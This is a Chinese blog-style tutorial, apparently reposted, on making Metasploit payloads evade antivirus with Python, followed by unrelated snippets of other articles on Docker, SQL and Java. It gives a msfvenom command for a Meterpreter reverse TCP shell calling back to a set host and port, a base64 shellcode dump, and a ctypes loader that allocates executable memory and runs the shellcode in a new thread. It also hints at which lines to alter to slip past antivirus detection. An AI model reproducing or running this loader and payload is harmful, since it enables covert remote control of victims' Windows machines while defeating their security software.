python 生成payload_利用Python进行Payload分离免杀

缺点:

编译成exe以后体积过大

实现:

msf生成shellcode代码:

msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.3.60 LPORT=3333 -f c

27176982d9b17e5d042a960d9629633c.png

将payload给copy下来,去除引号。

\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42

\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33

\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66

\x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x4a\x53

\x56\x34\x74\x53\x45\x49\x74\x4b\x50\x49\x74\x4d\x45\x58\x6a

\x6a\x53\x41\x48\x52\x55\x59\x74\x5a\x49\x41\x48\x54\x69\x30

\x6b\x59\x34\x7a\x70\x4a\x69\x7a\x53\x4c\x41\x64\x59\x78\x2f

\x36\x7a\x42\x7a\x77\x30\x42\x78\x7a\x6a\x67\x64\x66\x59\x44

\x66\x66\x67\x37\x66\x53\x52\x31\x35\x46\x69\x4c\x57\x43\x51

\x42\x30\x32\x61\x4c\x44\x45\x75\x4c\x57\x42\x77\x42\x30\x34

\x73\x45\x69\x77\x48\x51\x69\x55\x51\x6b\x4a\x46\x74\x62\x59

\x56\x6c\x61\x55\x66\x2f\x67\x58\x31\x39\x61\x69\x78\x4c\x72

\x6a\x56\x31\x6f\x4d\x7a\x49\x41\x41\x47\x68\x33\x63\x7a\x4a

\x66\x56\x47\x68\x4d\x64\x79\x59\x48\x69\x65\x6a\x2f\x30\x4c

\x69\x51\x41\x51\x41\x41\x4b\x63\x52\x55\x55\x47\x67\x70\x67

\x47\x73\x41\x2f\x39\x56\x71\x43\x6d\x6a\x41\x71\x41\x4d\x38

\x61\x41\x49\x41\x44\x51\x57\x4a\x35\x6c\x42\x51\x55\x46\x42

\x41\x55\x45\x42\x51\x61\x4f\x6f\x50\x33\x2b\x44\x2f\x31\x5a

\x64\x71\x45\x46\x5a\x58\x61\x4a\x6d\x6c\x64\x47\x48\x2f\x31

\x59\x58\x41\x64\x41\x72\x2f\x54\x67\x68\x31\x37\x4f\x68\x6e

\x41\x41\x41\x41\x61\x67\x42\x71\x42\x46\x5a\x58\x61\x41\x4c

\x5a\x79\x46\x2f\x2f\x31\x59\x50\x34\x41\x48\x34\x32\x69\x7a

\x5a\x71\x51\x47\x67\x41\x45\x41\x41\x41\x56\x6d\x6f\x41\x61

\x46\x69\x6b\x55\x2b\x58\x2f\x31\x5a\x4e\x54\x61\x67\x42\x57

\x55\x31\x64\x6f\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67

\x41\x66\x53\x68\x59\x61\x41\x42\x41\x41\x41\x42\x71\x41\x46

\x42\x6f\x43\x79\x38\x50\x4d\x50\x2f\x56\x56\x32\x68\x31\x62

\x6b\x31\x68\x2f\x39\x56\x65\x58\x76\x38\x4d\x4a\x41\x2b\x46

\x63\x50\x2f\x2f\x2f\x2b\x6d\x62\x2f\x2f\x2f\x2f\x41\x63\x4d

\x70\x78\x6e\x58\x42\x77\x37\x76\x77\x74\x61\x4a\x57\x61\x67

\x42\x54\x2f\x39\x55\x3d

将自己的代码放入第3行的shell_code位置。

import ctypes,base64

encode_shellcode = "shell_code"

shellcode = base64.b64decode(encode_shellcode)

rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)

ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))

handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)

ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

以上代码是绝对会被查杀的,但是可以通过修改代码绕过。思路如下,先查找杀软查杀哪里,再修改杀软查杀的代码,同时保证正常运行。提示一下,查杀的代码再5-6行之间,对其进行修改即可。

返回session:

03568202d7ad95cbb9966aeb83131a3c.png

免杀效果:

d243d6cf4fab53c1225fbd4575cad49d.png

参考资料:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/271259.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ping不通docker_初识docker

前言大家好,我是jack xu,本篇是我在今日头条的首秀,我的英文名来源于jack ma,马云,所以大家也可以叫我徐云,即我希望像马云一样富有、成功,另外我名字中的杰与jack也是谐音关系。今天给大家带来…

H5基础标签

一、字体标签 1.text-indent:首行缩进 2.text-decoration:文本修饰(text-decoration:none;除去文字的下划线;text-decoration:line-through;文字上加删除线) 3.letter-spacing&#…

SQL语言基础:数据库语言概念介绍

1、概念介绍SQL(Structured Query Lanauage)结构化查询语言是关系数据库中最普遍使用的语言。主要包括查询、数据操纵、数据定义、数据控制功能,是一种通用的、功能强大的关系数据库的标准语言。2、SQL语言分类2.1 数据库定义语言&#xff08…

configuration 命名空间_kubernetes30:monitoring命名空间处于Terminating状态的处理方法...

删除monitoring命名空间时总也无法彻底删除,发现monitoring处于Terminating状态,故有此文。kubectl get namespaces -o wide解决:尝试使用force delete。kubectl delete namespace monitoring --force --grace-period0发现强制删除没有成功。…

SQL语言基础:SQL语言概念知识笔记

1、SQL标准ANSI(美国国家标准机构)SQL对ANSI SQL进行修改后在1992年采用的标准SQL-92或SQL2SQL-99或SQL3标准从SQL2扩充而来,增加了对象关系特征和许多其他新的功能。最近的标准版本是SQL:20032、SQL的特点综合统一:SQ…

重定向与转发

使用重定向方法sendRedirect()将用户重新定向到一个JSP页面或另一个Servlet。 RequestDispatcher对象调用void forward(ServletRequest request,ServletResponse response) 方法可以将用户对当前JSP页面或Servlet的请求转发给RequestDispatcher对象所指定的JSP页面或Servlet。 …

ubuntu mysql 内存满了_Ubuntu mysql可以把data防止到内存盘中

作者:李祥敬2010-03-04/17:57Ubuntu mysql对于电脑使用的玩家的常用软件,然后我就学习及深入的研究Ubuntu mysql,在这里和大家一起探讨Ubuntu mysql的使用方法,希望对大家有用。1、如果Ubuntu mysql的data数据很少,内存…

原型(Prototype)的场景是不支持循环依赖的

原型(Prototype)的场景是不支持循环依赖的,通常会走到AbstractBeanFactory类中下面的判断,抛出异常。

网络工程中,VLAN到底有什么作用?

什么是VLAN呢?VLAN(Virtual Local Area Network)即虚拟局域网,是将一个物理的LAN在逻辑上划分成多个广播域的通信技术。在IEEE802.1Internetworking委员会结束了对VLAN初期标准的修订工作的时候。新出台的标准进一步完善了VLAN的体…

java的decode_Java decode机试题

/**** java编写encode方法和decode方法,机试题 请你用java,c,c* 中任何一种语言实现两个函数encode()和decode(),分别实现对字符串的变换和复原。* 变换函数encode()顺序考察以知字符串的字符,按以下规则逐组生成新字符…

hrjava项目原型html_Mockplus for Mac(原型设计工具)

Mockplus for Mac是Mac平台上一款简单、快速的原型设计工具,无需任何编程,不需要任何编程基础知识,帮你快速使用Mockplus设计图形。Mockplus封装了近200个组件,提供3000个以上的图标素材。做图时,只需要把这些组件放入…

Leetcode 给定一个数组,给定一个数字。返回数组中可以相加得到指定数字的两个索引

问题内容是:给定一个数组,给定一个数字。返回数组中可以相加得到指定数字的两个索引。 比如:给定nums [2, 7, 11, 15], target 9 那么要返回 [0, 1],因为2 7 9 这道题的优解是,一次遍历HashMap: 先去…

java 正则表达式 提取ip_java正则表达式提取地址中的ip和端口号

由于我需要用到java正则表达式提取地址中的ip和端口号,所以我就写了一个demo,测试一下,下面是demopublic class Test0810_1 {public static void main(String[] args) {//通过控制板输入想要输入的地址,然后测试是否符合规则Scann…

SQL语言基础:常用的数据查询语句

1、创建表语法格式&#xff1a;creat table <表名> (<,列名><数据类型>[列级完整性约束条件]<,列名><数据类型>[列级完整性约束条件]...[,<表级完整性约束条件>]);列级完整性约束条件&#xff1a;主键、外键 、唯一 unique、检查 、默认值…

两个不同网段的局域网如何互通_不同网段之间如何通信?

计算机之前是如何实现互相通信的呢&#xff1f;正文首先&#xff0c;计算机之间通信人为设定一个准则&#xff0c;这个准则是什么呢&#xff1f;如果两台计算机在一个相同网段&#xff0c;不需要辅助设备(网关)的帮助&#xff0c;可以直接通信。如果两台计算机在不同网段&#…

Java是值传递还是引用传递?

Java是值传递&#xff1a; &#xff08;1&#xff09;基本类型作为参数传递时&#xff0c;是传递值的拷贝&#xff0c;无论你怎么改变这个拷贝&#xff0c;原值是不会改变的&#xff1b; &#xff08;2&#xff09;对象的引用作为参数传递时&#xff0c;是把对象在内存中的地址…

SpringCloud Gateway的组成结构

SpringCloud Gateway结构 SpringCloud Gateway的底层基于Netty&#xff0c;主要组成有Predicates&#xff08;谓词或者断言&#xff09;、Route&#xff08;路由&#xff09;、Filter&#xff08;过滤器&#xff09; 思维导图----------SpringCloud Gateway的组成&#xff1a; …

java resource放入的文件没有生成在classes中_快速部署版@开源在线考试系统一键生成各种题型试卷且实时判卷...

首先声明此项目来自开源网&#xff0c;小编也是爱好者&#xff1b;阅读本文之前相信已经阅读过【开源在线考试系统一键生成各种题型试卷且可以实时判卷】开源在线考试系统一键生成各种题型试卷且可以实时判卷本文分享快速部署版jar包&#xff0c;原项目前后台是单独项目&#x…

java 三大框架面试题

1.Hibernate工作原理及为什么要用&#xff1f; 原理&#xff1a; 1.读取并解析配置文件 2.读取并解析映射信息&#xff0c;创建SessionFactory3.打开Session 4.创建事务Transation 5.持久化操作 6.提交事务 7.关闭Session 8.关闭SesstionFactory 为什么要用&#xff1a; 1. 对J…

SQL语言基础:SQL中的数据完整性约束用法

前言数据库的完整性是指数据库正确性和相容性&#xff0c;是防止合法用户使用数据库时向数据库加入不符合语义的数据&#xff0c;从而保证了数据库中的数据是正确的&#xff0c;避免非法的更新操作。1、主键约束1.1 完整性约束条件完整性约束条件作用的对象有关系、元组、列三种…